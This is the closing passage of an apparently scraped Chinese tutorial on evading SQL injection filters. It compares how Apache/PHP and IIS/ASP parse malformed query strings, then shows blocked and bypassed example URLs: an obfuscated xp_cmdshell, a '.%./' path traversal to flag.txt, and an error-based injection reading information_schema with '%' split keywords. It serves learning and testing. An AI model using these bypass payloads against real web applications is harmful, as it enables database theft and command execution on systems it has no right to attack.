<div>
<div class="syntaxhighlightersql" id="highlighter_777490">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Unreserved: a-z, A-Z, 0-9 </code><code class="sql color1">and</code> <code class="sql plain">_ . ! ~ * ' ()</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Reserved : ; / ? : @ & = + $ ,</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Unwise : { } | \ ^ [ ] `</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
不同的Web服务器处理处理构造得特殊请求时有不同的逻辑:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterplain" id="highlighter_6168">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="plain plain">| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP |</code>
</div>
<div class="line number2 index1 alt1">
<code class="plain plain">| :— | :— | :— |</code>
</div>
<div class="line number3 index2 alt2">
<code class="plain plain">| ?test[1=2 | test_1=2 | test[1=2 |</code>
</div>
<div class="line number4 index3 alt1">
<code class="plain plain">| ?test=% | test=% | test= |</code>
</div>
<div class="line number5 index4 alt2">
<code class="plain plain">| ?test%00=1 | test= | test=1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="plain plain">| ?test=1%001 | NULL | test=1 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="plain plain">| ?test+d=1+2 | test_d=1 2 | test d=1 2 |</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
eg:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_513731">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Forbidden: http://localhost/?xp_cmdshell</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Bypassed : http://localhost/?xp[cmdshell</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Forbidden: http://localhost/test.asp?file=../flag.txt</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed : http://localhost/test.asp?file=.%./flag.txt</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">Forbidden: http://localhost/news.asp?id=10 </code><code class="sql color1">and</code> <code class="sql plain">1=0/(</code><code class="sql keyword">select</code> <code class="sql keyword">top</code> <code class="sql plain">1 table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables)</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect </code><code class="sql keyword">top</code> <code class="sql plain">1 ta%ble_name fr%om info%rmation_schema.tables)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>总结</strong></span></p>
<p>
以上就是关于sql注入绕过的技巧总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对的支持。</p>
<p>
原文链接:http://byd.dropsec.xyz/2017/03/21/SQL注入-绕过/</p>
頁:
[1]